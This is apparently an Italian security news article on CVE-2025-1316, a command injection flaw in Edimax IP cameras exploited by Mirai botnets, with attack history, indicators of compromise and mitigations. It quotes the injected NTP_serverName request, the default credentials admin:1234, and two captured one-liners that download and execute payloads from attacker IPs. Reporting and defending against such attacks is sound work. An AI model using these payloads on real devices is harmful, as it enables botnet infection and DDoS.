Sommario
Una nuova vulnerabilità di command injection colpisce le telecamere di sicurezza Edimax, permettendo a cybercriminali di diffondere varianti del malware Mirai. Secondo il Security Intelligence and Response Team (SIRT) di Akamai, la vulnerabilità, identificata come CVE-2025-1316, è attivamente sfruttata da botnet che prendono di mira dispositivi IoT vulnerabili, con attacchi che risalgono almeno a maggio 2024.
L’esistenza di un proof-of-concept (PoC) per l’exploit risale a giugno 2023, e sono stati osservati diversi attacchi nel tempo, con picchi di attività tra settembre 2024, gennaio e febbraio 2025.
La vulnerabilità CVE-2025-1316 e il metodo di attacco
Il punto d’ingresso per l’attacco è il file /camera-cgi/admin/param.cgi, utilizzato nei dispositivi Edimax IoT. Il malware sfrutta un’opzione mal configurata (ipcamSource) per eseguire codice malevolo nel campo NTP_serverName, permettendo agli attaccanti di iniettare comandi arbitrari.
Gli exploit osservati utilizzano le credenziali di default delle telecamere Edimax, ovvero admin:1234, per ottenere accesso e caricare uno script maligno. Il codice sfrutta il comando wget per scaricare ed eseguire uno script curl.sh, che poi installa il payload del botnet Mirai.
Campagna di attacco e indicatori di compromissione
I primi segnali di attività malevola sono stati individuati nei honeypot di Akamai a ottobre 2024, con exploit che miravano a scaricare ed eseguire il file curl.sh dalla rete degli attaccanti. Il malware risultante ha mostrato comportamenti tipici dei botnet Mirai, tra cui l’esecuzione di comandi per compromettere architetture x86, ARM e MIPS.
Esempi di exploit registrati nei honeypot mostrano un comando come questo:
/camera-cgi/admin/param.cgi?action=update&ipcamSource=/ntp.asp&r=20130724&NTP_enable=1&NTP_serverName=;
$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)
Una volta eseguito lo script, il malware tenta di scaricare e avviare un payload Mirai, adattandosi all’architettura hardware del dispositivo infetto. Le architetture colpite includono x86, MIPS, ARM, PPC e SPARC.
Le connessioni a angela.spklove[.]com e altre destinazioni sospette indicano che gli attaccanti usano un server C2 (Command and Control) per coordinare le operazioni dei dispositivi infetti.
Botnet multiple sfruttano la vulnerabilità
Oltre al primo gruppo di attaccanti, una seconda botnet ha iniziato a sfruttare la stessa vulnerabilità con varianti di Mirai dotate di meccanismi di anti-debugging. Il malware viene scaricato tramite wget.sh e usa file eseguibili con nomi che iniziano con “.S”.
Esempi di payload distribuiti includono:
cd /tmp ; wget http://170.39.193.232/.Sx86_64 ; chmod 777 .Sx86_64 ; ./.Sx86_64 x86 ;
Le varianti di malware osservate sfruttano attacchi DDoS come:
- UDP flood targeting OpenVPN
- TCP SYN attack
- Handshake flooding
- GRE IP-based floods
Conseguenze e mitigazioni
L’attacco mostra come i dispositivi IoT vulnerabili continuino a essere sfruttati per costruire botnet su larga scala. Il fatto che il proof-of-concept di CVE-2025-1316 esista dal 2023 evidenzia la necessità di aggiornare e monitorare i dispositivi di rete.
Misure di mitigazione consigliate:
- Aggiornare il firmware delle telecamere Edimax, se disponibile.
- Cambiare immediatamente le credenziali di default.
- Monitorare il traffico di rete alla ricerca di connessioni sospette ai domini indicati negli indicatori di compromissione (IOCs).
- Segmentare i dispositivi IoT dalle reti aziendali e critiche.
- Implementare firewall e bloccare accessi non autorizzati all’endpoint /camera-cgi/admin/param.cgi.
Questa vulnerabilità evidenzia l’importanza di una gestione attenta della sicurezza per dispositivi IoT, in particolare quelli non più supportati dal produttore. Akamai consiglia di sostituire i dispositivi vulnerabili, poiché alcuni modelli non riceveranno aggiornamenti di sicurezza.
